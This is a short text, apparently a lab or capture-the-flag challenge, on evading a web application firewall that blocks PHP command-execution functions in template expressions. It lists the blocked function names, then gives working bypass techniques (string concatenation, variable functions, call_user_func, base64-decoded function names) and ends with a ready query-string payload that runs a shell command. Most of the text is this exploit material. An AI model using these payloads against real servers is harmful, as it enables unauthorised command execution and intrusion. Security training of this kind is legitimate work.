A WAF blocks dangerous keywords in template expressions. Can you bypass it?
Blocked: system, exec, passthru, shell_exec, popen, proc_open, eval
The filter checks for whole keyword strings. Bypass techniques:
1. String concatenation: 'sys'.'tem' → system
2. Variable functions: $f='sys'.'tem'; $f('id')
3. call_user_func('sys'.'tem', 'id')
4. base64_decode('c3lzdGVt')('id') — base64 of "system"
Example payload: ?name=call_user_func('sys'.'tem','id')